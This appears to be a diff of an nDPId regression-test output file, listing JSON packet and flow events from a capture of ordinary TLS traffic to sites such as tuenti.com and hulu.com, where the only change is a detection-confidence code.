00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1646482785347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785347,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGfbVfg6lbwKgBgAG7yDD0fDnYM6BmgqASOJCOBAAAAgQFtAQCCAoi\/WCZwibeMQEDAwk="} 
01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1646482785351,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482785351,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5c2VAAEAG+lLAqAGAX4OpW8gwAbszoGaC9Hw52YAYAfYZoQAAAQEICsIm3l8i\/WCZFgMBAgABAAH8AwNK0euZMFtaCNBtu+eL8QS+C1QwW1wzikaweB9ZeLN7jCCkdWD5KYTe5rYj3sVQQUUDDmKS7Ul8Bkz8dJPsZBeSHgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAAp0dWVudGkuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIJK5tprzoOfSjZ23KXMf08y5udMKZfRYOXHDalLyYQBZABcAQQRLZU+TiBidby\/7mJhjeaCEAZfIl\/ESg4w9XgdOmdSs6KJ9\/6C1zE6e09432pgZPLx5qZNVUeHl8Lum72bGeXBPACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482786097,"flow_last_seen":1646482786097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482786097,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1646482786097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786097,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8MYNAAEAGPTLAqAGAX4OqW5mGAbs4G85LAAAAAKAC+vAJ+AAAAgQFtAQCCApUK4E8AAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1646482786139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786139,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfbVfg6pbwKgBgAG7mYaAJv+vOBvOTKASOJA3NAAAAgQFtAQCCAojEPIqVCuBPAEDAwk="} 
01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1646482786140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482786140,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5MYVAAEAGOzPAqAGAX4OqW5mGAbs4G85MgCb\/sIAYAfY7ugAAAQEIClQrgWcjEPIqFgMBAgABAAH8AwPCuINo9aszS1NOKEJoT\/qcXc1z2+SkMYjVWEN9Dzm1uCAc1Fe\/tF+S3TB+puhQn5k1kl\/SrZE1Zu7DG17b6iPYkAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFzdGF0aWMudHVlbnRpLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAO0kbEPJvFV01Owk3nxVpBPAsVRMhGqyVHONxZeCXXCAAXAEEEdYt+qtkVgPe4ucZXkNkiZFAQTN50kMr6BFmQ8vGiT4E\/aWy5wxXrEUez6C+lutJauRk\/zdA9y71YXWyeYxHbNwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti 
Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482791144,"flow_last_seen":1646482791144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482791144,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1646482791144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791144,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8FF5AAEAGQPrAqAGAX2XD1sjoAbs9AWSXAAAAAKAC+vBfJgAAAgQFtAQCCAoz72hZAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1646482791167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791167,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADMGYlhfZcPWwKgBgAG7yOhRyYQJPQFkmKAS\/ohadwAAAgQFtAQCCAoA0SpiM+9oWQEDAwc="} 
01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1646482791170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482791170,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5FGBAAEAGPvvAqAGAX2XD1sjoAbs9AWSYUcmECoAYAfYkYQAAAQEICjPvaHMA0SpiFgMBAgABAAH8AwPkjLny33P+mExr32cMRl62\/8RJSZlKid1V05U+ySIWLCA+yoN1VMfFXakU81pmrArAv4PMFa74gV6zhhtZIkRahgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAhodWx1LmNvbQAXAAD\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"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482801387,"flow_last_seen":1646482801387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482801387,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1646482801387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801387,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8u7RAAEAGHxDAqAGAImB7b6+aAFDTrORQAAAAAKAC+vAeUwAAAgQFtAQCCAqmtsAlAAAAAAEDAwc="} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1646482801394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801394,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8tJQAAHkGLLAiYHtvwKgBgABQr5rfpgWE06zkUaAS\/\/9QBgAAAgQFlgQCCArcngeAprbAJQEDAwg="} 
@@ -156,8 +156,8 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1646482802720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802720,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8g6pAAEAGYJjAqAGAI8lwiLgSAbvaEoGzAAAAAKAC+vAuRQAAAgQFtAQCCArAZPJXAAAAAAEDAwc="} 